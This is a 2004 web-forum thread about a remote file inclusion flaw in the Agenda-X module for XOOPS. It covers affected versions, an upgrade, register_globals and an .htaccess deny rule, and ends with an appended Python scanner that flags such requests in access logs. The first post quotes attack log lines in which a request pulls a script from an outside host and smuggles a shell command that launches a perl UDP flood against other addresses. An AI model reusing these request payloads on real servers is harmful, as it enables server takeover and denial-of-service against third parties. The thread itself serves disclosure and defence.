


#1 Posted on: 2004/5/22 22:56 Agendax vulnerability
I was contacted by my network folks telling me of a udp flood attack. We traced to malicious code being run in agendax. It looks like this:

servecity.com:200.222.244.130 - - [22/May/2004:21:34:37 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&cmd=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/dev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
servecity.com:200.222.244.130 - - [22/May/2004:21:34:37 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&cmd=cd%20/tmp;nohup%20perl%20udp006.html%2069.93.199.98%2080%2050000%20>>%20/dev/null%20& HTTP/1.1" 200 1203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
servecity.com:200.222.244.130 - - [22/May/2004:21:34:37 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&cmd=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/dev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
servecity.com:200.222.244.130 - - [22/May/2004:21:34:37 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&cmd=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/dev/null%20& HTTP/1.1" 200 1203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
servecity.com:200.222.244.130 - - [22/May/2004:22:23:34 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&cmd=cd%20/tmp;nohup%20perl%20udp006.html%2069.93.199.98%2080%2050000%20>>%20/dev/null%20& HTTP/1.1" 200 1227 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
servecity.com:200.222.244.130 - - [22/May/2004:22:23:34 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&cmd=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/dev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
servecity.com:200.222.244.130 - - [22/May/2004:22:23:34 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&cmd=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/dev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
servecity.com:200.222.244.130 - - [22/May/2004:22:28:32 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&cmd=cd%20/tmp;nohup%20perl%20udp006.html%2069.93.199.98%2080%2050000%20>>%20/dev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"


I removed the mod for the moment. I did not find anything here. Anyone know anything?

--> Sorry, I found something deeper in the forum <--

Never mind

socorro
Just popping in
Joined: 2004/3/21 7:21
Group: Registered Users
Posts: 5


#2 Posted on: 2004/6/1 4:12 Re: Agendax vulnerability
I confirm security problem with agendax

One member of xoops-france was hacked by Brazilian hackers.

The blamed file is addevent.inc.php; the variable $agendax_path of this script is obviously not checked.

winsion
Just popping in
Joined: 2003/11/23 0:00
From Perpignan, France
Group: Registered Users
Posts: 55


#3 Posted on: 2004/7/3 3:52 Re: Agendax vulnerability
please don't post this on a public forum....
Some hackers are very happy with this.. they don't have to search anymore.

In fact you should remove or rename this file asap... and do some corrections in this file

philou
Quite a regular
Joined: 2002/5/6 3:37
From France
Group: Registered Users
Posts: 313


#4 Posted on: 2004/7/3 21:44 Re: Agendax vulnerability
Quote:

In fact you should remove or rename this file asap... and do some corrections in this file


My site's not live yet, but other than renaming the file, since I don't have the skills to make any corrections, should I just disable agendax?

Mod still seems to work after renaming the file.

FlySwatter
Just popping in
Joined: 2004/6/2 9:28
Group: Registered Users
Posts: 71


#5 Posted on: 2004/7/4 1:38 Re: Agendax
The vulnerability described in above post affects only Agenda-X versions prior to 1.2.4

Solutions:
configure your PHP installation with register_global to ON
or download Agenda-x v1.2.4

The most recent version of Agenda-X is 2.1.1

---------
Chinese Web: http://www.wjue.org
English Web: http://www.guanxiCRM.com
Offshore IT Outsourcing: http://China-Offshore.com

wjue
Not too shy to talk
Joined: 2002/8/3 2:36
Group: Registered Users
Posts: 185


#6 Posted on: 2004/7/4 8:03 Re: Agendax
I feel better now

FlySwatter
Just popping in
Joined: 2004/6/2 9:28
Group: Registered Users
Posts: 71


#7 Posted on: 2004/7/4 8:48 Re: Agendax
Wow, You Gotta Stop Scaring Me.

iHackCode
Module Developer
Joined: 2004/6/28 19:11
From Greater Seattle Area
Group: Registered Users, Wiki Group
Posts: 979


#8 Posted on: 2004/7/5 9:09 Re: Agendax
My server just got compromised by this.

Is there a list maintained somewhere that people can check?

Just a simple list of module and version would be a start.

The site was running 1.2

datamile
Just popping in
Joined: 2002/11/24 8:00
From UK
Group: Registered Users
Posts: 22


#9 Posted on: 2004/7/7 11:22 Re: Agendax
I don't know of a list but you should check the individual home sites of 3rd party modules you are running.

Agendax had a serious security issue and was fixed a while ago.

You should be sure to set Register_Globals OFF. The issue was around calling the addevent.inc.php file directly in the URL. Easy enough to prevent.

I still get daily attempts at this but they still don't get in. To make double sure they don't I have an .htaccess file with this in it:

-------------------------------
php_value register_globals 0

<files addevent.inc.php>
Order Deny,Allow
Deny from all
</files>
-------------------------------



DonXoop
Joined: 2003/11/26 21:46
From Third stone, bluish, under siege
Group: Registered Users
Posts: 1171
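A log check for the request pattern shown in post #1 and the daily attempts mentioned in post #9, added here as an example (not code from any poster or from the Agenda-X project): it flags requests to a PHP script whose query parameter holds a remote URL and reports whether the server answered 2xx or refused. The function names, sample lines, hosts and addresses are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Layout seen in post #1: vhost:client ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<vhost>[^:\s]+):(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?) HTTP/\d\.\d" (?P<status>\d{3}) '
)
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def inspect(line):
    """Return a finding if a PHP request carries a remote URL in a parameter."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    path, _, query = m['target'].partition('?')
    if not path.lower().endswith('.php'):
        return None
    for pair in query.split('&'):
        name, _, value = pair.partition('=')
        if name and REMOTE_URL.match(unquote(value)):
            return {
                'client': m['client'],
                'script': path,
                'param': name,
                'status': int(m['status']),
                # 2xx: the script ran; 403 is what a "Deny from all" rule returns
                'served': m['status'].startswith('2'),
            }
    return None


def scan(lines):
    """Collect findings from an iterable of access-log lines."""
    return [f for f in map(inspect, lines) if f is not None]

# Constructed sample lines: hosts and addresses are placeholders, not thread data.
PREFIX = 'www.example.org:192.0.2.10 - - [07/Jul/2004:10:00:0%d -0400] '
INCLUDE = '"GET /modules/agendax/addevent.inc.php?agendax_path=http://files.example.net/a.gif?&x=1 HTTP/1.1"'
SAMPLE = [
    PREFIX % 1 + INCLUDE + ' 200 431 "-" "-"',   # request was served
    PREFIX % 2 + INCLUDE + ' 403 210 "-" "-"',   # refused by the deny rule
    PREFIX % 3 + '"GET /modules/news/article.php?storyid=12 HTTP/1.1" 200 5120 "-" "-"',
]

if __name__ == '__main__':
    for finding in scan(SAMPLE):
        print(finding)
```

A finding with `served` set to true means the include script answered the request and the host should be examined; a 403 finding is an attempt that the access rule turned away.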






